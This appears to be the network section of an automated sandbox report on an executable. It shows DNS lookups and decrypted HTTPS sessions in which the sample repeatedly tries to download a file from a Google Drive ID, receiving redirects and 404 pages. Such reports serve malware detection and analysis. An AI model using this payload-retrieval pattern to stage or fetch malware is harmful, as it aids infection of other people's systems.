                                                        Dec 5, 2024 17:08:59.834522009 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:59.834537029 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:08:59.834682941 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:08:59.834697962 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:00.154993057 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:00.155183077 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:00.155196905 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:00.155237913 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:00.155313969 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:00.155406952 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:00.155406952 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:00.155581951 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:00.155921936 CET49816443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:00.155957937 CET44349816142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:10.168889046 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.168973923 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.169162035 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.169327974 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.169380903 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.442018032 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.442203045 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.442509890 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.442555904 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.442598104 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.442619085 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.715497017 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.715740919 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.715744972 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.715878010 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.715933084 CET44349817142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:09:10.715953112 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.716092110 CET49817443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:09:10.716223001 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:10.716296911 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:10.716500044 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:10.716617107 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:10.716650963 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:10.982760906 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:10.982960939 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:10.983258009 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:10.983273983 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:10.983553886 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:10.983575106 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:11.302784920 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:11.302938938 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:11.302962065 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:11.302980900 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:11.302997112 CET44349818142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:09:11.303189993 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:11.303462029 CET49818443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:09:11.303519011 CET44349818142.250.64.193192.168.11.20

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 5, 2024 17:03:00.590044022 CET6260453192.168.11.201.1.1.1
                                                        Dec 5, 2024 17:03:00.715198040 CET53626041.1.1.1192.168.11.20
                                                        Dec 5, 2024 17:03:01.309020996 CET6109153192.168.11.201.1.1.1
                                                        Dec 5, 2024 17:03:01.438091040 CET53610911.1.1.1192.168.11.20

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 5, 2024 17:03:00.590044022 CET192.168.11.201.1.1.10x6af5Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                        Dec 5, 2024 17:03:01.309020996 CET192.168.11.201.1.1.10xf573Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 5, 2024 17:03:00.715198040 CET1.1.1.1192.168.11.200x6af5No error (0)drive.google.com142.250.217.238A (IP address)IN (0x0001)false
                                                        Dec 5, 2024 17:03:01.438091040 CET1.1.1.1192.168.11.200xf573No error (0)drive.usercontent.google.com142.250.64.193A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • drive.google.com
                                                        • drive.usercontent.google.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.11.2049751142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:03:01 UTC216OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2024-12-05 16:03:01 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:01 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-F6G6bR_yHGxtarlfAUxgCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.11.2049752142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:03:01 UTC258OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2024-12-05 16:03:02 UTC2222INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:01 GMT
                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                        Content-Security-Policy: script-src 'nonce-oNPDdKAk37_6oigAA74vJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5jf1TaTr9YTTJPToHFfbzYasyfvoHbXluHJrAH5cmUs9ZhDBjVIqFmUuxRHE7rBYv6fwM
                                                        Server: UploadServer
                                                        Set-Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF; expires=Fri, 06-Jun-2025 16:03:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:03:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 56 71 34 73 7a 4a 5f 57 62 7a 62 6a 32 6c 59 76 77 4e 4e 76 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FVq4szJ_Wbzbj2lYvwNNvw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.11.2049753142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:03:12 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:12 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:12 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-MUSZ17QPvNwTr9p3pZA4Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.11.2049754142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:03:12 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:13 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:13 GMT
                                                        Content-Security-Policy: script-src 'nonce-Mmoj_ohssKHKHy5i_yN9cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC7-mo0eyhSx3jVfBzA13XnWUgKAUmJuKurAgPVwfzX6ldUm5jmWvaoqHpiL_Z1eCVCcWy8Q5jjyJw
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:03:13 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 55 79 68 67 64 75 67 71 43 56 54 32 66 41 73 45 4e 73 4c 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BUyhgdugqCVT2fAsENsLvA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.11.2049755142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:03:23 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:23 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:23 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-x9yDRAEl3iGWRv7e3DuAcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.11.2049756142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:03:24 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:24 UTC1847INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:24 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-jfBBg7CqfuES3iRANo0zmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC7esx6BrnvM0LaBVwwcbk3EBnvewExtBtZLxpLHAm4ls9aC1kSK0v3ZZft3WNz-XLUjlbM
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:03:24 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 64 46 5a 66 6a 73 78 6d 4f 58 39 32 4c 64 5f 49 78 4b 44 35 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CdFZfjsxmOX92Ld_IxKD5g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.11.2049757142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:03:34 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
